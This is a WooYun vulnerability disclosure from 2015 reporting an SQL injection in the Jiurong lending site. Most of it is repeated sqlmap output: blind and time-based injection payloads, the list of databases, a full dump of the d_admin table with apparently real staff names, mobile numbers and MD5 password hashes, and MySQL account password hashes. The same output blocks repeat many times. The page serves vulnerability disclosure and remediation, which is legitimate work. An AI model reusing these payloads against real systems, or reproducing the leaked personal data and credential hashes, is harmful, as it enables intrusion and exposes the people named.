当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132486

漏洞标题:玖融网主站某处SQL注入漏洞

相关厂商:玖融网

漏洞作者: 李叫兽就四李叫兽

提交时间:2015-08-13 09:49

修复时间:2015-09-28 17:28

公开时间:2015-09-28 17:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-14: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开

简要描述:

忘带安全啊!!!

详细说明:

https://**.**.**.**/loan/loanInfo/id/11449* (GET)


伪静态
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
available databases [7]:
[*] information_schema
[*] j_bbs
[*] j_oa
[*] j_session
[*] j_site
[*] j_uc
[*] mysql
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
Database: j_site
Table: d_admin
[9 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| groupid | smallint(3) |
| id | int(11) |
| loginip | varchar(100) |
| logintime | int(11) |
| mobile | varchar(11) |
| password | varchar(100) |
| status | tinyint(2) |
| tname | varchar(100) |
| uname | varchar(100) |
+-----------+--------------+
Database: j_site
Table: d_admin
[9 entries]
+----+---------+--------------+-------------+--------+-------------+---------+----------------------------------+-----------+
| id | groupid | uname | tname | status | mobile | loginip | password | logintime |
+----+---------+--------------+-------------+--------+-------------+---------+----------------------------------+-----------+
| 1 | 1 | baihuopu | baihuopu | 1 | 2147483647 | NULL | 614c21083bf012b639b751d757801c29 | NULL |
| 3 | 1 | 96cfxuben | 徐奔 | 1 | 18627131553 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
| 4 | 3 | 96cflipinlan | 李品兰 | 1 | 13971180981 | NULL | d5b359e04970a92f4f4a94588c0a9ac8 | NULL |
| 5 | 1 | jiurongceo | 王总 | 1 | 13545147988 | NULL | 9656875778812c916d7f519a51f3da71 | NULL |
| 7 | 1 | 96cfchengru | \\?ff\\?f0汝 | 1 | 13986267347 | NULL | 5b100ff2d31a4c2df1c900631d1cf832 | NULL |
| 9 | 2 | kefu | 客服 | 1 | 18507100909 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 11 | 4 | jrwzhangjun | 张俊 | 1 | 18507100900 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 13 | 1 | 96guojie | 郭杰 | 1 | 1 | NULL | 0905ebdece1965ba348c771d4c663345 | NULL |
| 15 | 1 | 13352271912 | 候斌 | 1 | 13352271912 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
+----+---------+--------------+-------------+--------+-------------+---------+----------------------------------+-----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
Database: j_site
Table: d_admin
[9 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| groupid | smallint(3) |
| id | int(11) |
| loginip | varchar(100) |
| logintime | int(11) |
| mobile | varchar(11) |
| password | varchar(100) |
| status | tinyint(2) |
| tname | varchar(100) |
| uname | varchar(100) |
+-----------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
Database: j_site
Table: d_admin
[9 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| groupid | smallint(3) |
| id | int(11) |
| loginip | varchar(100) |
| logintime | int(11) |
| mobile | varchar(11) |
| password | varchar(100) |
| status | tinyint(2) |
| tname | varchar(100) |
| uname | varchar(100) |
+-----------+--------------+
Database: j_site
Table: d_admin
[9 entries]
+----+---------+--------------+-----------+--------+-------------+---------+----------------------------------+-----------+
| id | groupid | uname | tname | status | mobile | loginip | password | logintime |
+----+---------+--------------+-----------+--------+-------------+---------+----------------------------------+-----------+
| 1 | 1 | baihuopu | baihuopu | 1 | 2147483647 | NULL | 614c21083bf012b639b751d757801c29 | NULL |
| 3 | 1 | 96cfxuben | 徐奔 | 1 | 18627131553 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
| 4 | 3 | 96cflipinlan | 李品兰 | 1 | 13971180981 | NULL | d5b359e04970a92f4f4a94588c0a9ac8 | NULL |
| 5 | 1 | jiurongceo | 王总 | 1 | 13545147988 | NULL | 9656875778812c916d7f519a51f3da71 | NULL |
| 7 | 1 | 96cfchengru | \?ff\?f0汝 | 1 | 13986267347 | NULL | 5b100ff2d31a4c2df1c900631d1cf832 | NULL |
| 9 | 2 | kefu | 客服 | 1 | 18507100909 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 11 | 4 | jrwzhangjun | 张俊 | 1 | 18507100900 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 13 | 1 | 96guojie | 郭杰 | 1 | 1 | NULL | 0905ebdece1965ba348c771d4c663345 | NULL |
| 15 | 1 | 13352271912 | 候斌 | 1 | 13352271912 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
+----+---------+--------------+-----------+--------+-------------+---------+----------------------------------+-----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
current user: 'jiurong@192.168.0.%'
current user is DBA: False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
database management system users password hashes:
[*] jiurong [1]:
password hash: *9A410775C1D8FFBC36A627D2B344D9B66AB2391A
[*] root [1]:
password hash: *650282E78C86D2233883DF5B59E9DD640BC156BC
[*] slaveroot [1]:
password hash: *978E3885B0036AD8EA2B7565855@6776B8A43B4A
[*] wangliang [1]:
password hash: *381AB020957F8374AF7F329280B5E1B2CEED097F
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
database management system users password hashes:
[*] jiurong [1]:
password hash: *9A410775C1D8FFBC36A627D2B344D9B66AB2391A
[*] root [1]:
password hash: *650282E78C86D2233883DF5B59E9DD640BC156BC
[*] slaveroot [1]:
password hash: *978E3885B0036AD8EA2B7565855@6776B8A43B4A
[*] wangliang [1]:
password hash: *381AB020957F8374AF7F329280B5E1B2CEED097F
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: mysql

漏洞证明:

https://**.**.**.**/loan/loanInfo/id/11449* (GET)


伪静态
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
available databases [7]:
[*] information_schema
[*] j_bbs
[*] j_oa
[*] j_session
[*] j_site
[*] j_uc
[*] mysql
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
Database: j_site
Table: d_admin
[9 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| groupid | smallint(3) |
| id | int(11) |
| loginip | varchar(100) |
| logintime | int(11) |
| mobile | varchar(11) |
| password | varchar(100) |
| status | tinyint(2) |
| tname | varchar(100) |
| uname | varchar(100) |
+-----------+--------------+
Database: j_site
Table: d_admin
[9 entries]
+----+---------+--------------+-------------+--------+-------------+---------+----------------------------------+-----------+
| id | groupid | uname | tname | status | mobile | loginip | password | logintime |
+----+---------+--------------+-------------+--------+-------------+---------+----------------------------------+-----------+
| 1 | 1 | baihuopu | baihuopu | 1 | 2147483647 | NULL | 614c21083bf012b639b751d757801c29 | NULL |
| 3 | 1 | 96cfxuben | 徐奔 | 1 | 18627131553 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
| 4 | 3 | 96cflipinlan | 李品兰 | 1 | 13971180981 | NULL | d5b359e04970a92f4f4a94588c0a9ac8 | NULL |
| 5 | 1 | jiurongceo | 王总 | 1 | 13545147988 | NULL | 9656875778812c916d7f519a51f3da71 | NULL |
| 7 | 1 | 96cfchengru | \\?ff\\?f0汝 | 1 | 13986267347 | NULL | 5b100ff2d31a4c2df1c900631d1cf832 | NULL |
| 9 | 2 | kefu | 客服 | 1 | 18507100909 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 11 | 4 | jrwzhangjun | 张俊 | 1 | 18507100900 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 13 | 1 | 96guojie | 郭杰 | 1 | 1 | NULL | 0905ebdece1965ba348c771d4c663345 | NULL |
| 15 | 1 | 13352271912 | 候斌 | 1 | 13352271912 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
+----+---------+--------------+-------------+--------+-------------+---------+----------------------------------+-----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
Database: j_site
Table: d_admin
[9 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| groupid | smallint(3) |
| id | int(11) |
| loginip | varchar(100) |
| logintime | int(11) |
| mobile | varchar(11) |
| password | varchar(100) |
| status | tinyint(2) |
| tname | varchar(100) |
| uname | varchar(100) |
+-----------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
Database: j_site
Table: d_admin
[9 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| groupid | smallint(3) |
| id | int(11) |
| loginip | varchar(100) |
| logintime | int(11) |
| mobile | varchar(11) |
| password | varchar(100) |
| status | tinyint(2) |
| tname | varchar(100) |
| uname | varchar(100) |
+-----------+--------------+
Database: j_site
Table: d_admin
[9 entries]
+----+---------+--------------+-----------+--------+-------------+---------+----------------------------------+-----------+
| id | groupid | uname | tname | status | mobile | loginip | password | logintime |
+----+---------+--------------+-----------+--------+-------------+---------+----------------------------------+-----------+
| 1 | 1 | baihuopu | baihuopu | 1 | 2147483647 | NULL | 614c21083bf012b639b751d757801c29 | NULL |
| 3 | 1 | 96cfxuben | 徐奔 | 1 | 18627131553 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
| 4 | 3 | 96cflipinlan | 李品兰 | 1 | 13971180981 | NULL | d5b359e04970a92f4f4a94588c0a9ac8 | NULL |
| 5 | 1 | jiurongceo | 王总 | 1 | 13545147988 | NULL | 9656875778812c916d7f519a51f3da71 | NULL |
| 7 | 1 | 96cfchengru | \?ff\?f0汝 | 1 | 13986267347 | NULL | 5b100ff2d31a4c2df1c900631d1cf832 | NULL |
| 9 | 2 | kefu | 客服 | 1 | 18507100909 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 11 | 4 | jrwzhangjun | 张俊 | 1 | 18507100900 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 13 | 1 | 96guojie | 郭杰 | 1 | 1 | NULL | 0905ebdece1965ba348c771d4c663345 | NULL |
| 15 | 1 | 13352271912 | 候斌 | 1 | 13352271912 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
+----+---------+--------------+-----------+--------+-------------+---------+----------------------------------+-----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
current user: 'jiurong@192.168.0.%'
current user is DBA: False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
database management system users password hashes:
[*] jiurong [1]:
password hash: *9A410775C1D8FFBC36A627D2B344D9B66AB2391A
[*] root [1]:
password hash: *650282E78C86D2233883DF5B59E9DD640BC156BC
[*] slaveroot [1]:
password hash: *978E3885B0036AD8EA2B7565855@6776B8A43B4A
[*] wangliang [1]:
password hash: *381AB020957F8374AF7F329280B5E1B2CEED097F
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
database management system users password hashes:
[*] jiurong [1]:
password hash: *9A410775C1D8FFBC36A627D2B344D9B66AB2391A
[*] root [1]:
password hash: *650282E78C86D2233883DF5B59E9DD640BC156BC
[*] slaveroot [1]:
password hash: *978E3885B0036AD8EA2B7565855@6776B8A43B4A
[*] wangliang [1]:
password hash: *381AB020957F8374AF7F329280B5E1B2CEED097F
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: mysql

修复方案:

版权声明:转载请注明来源 李叫兽就四李叫兽@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-08-14 17:27

厂商回复:

CNVD确认所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无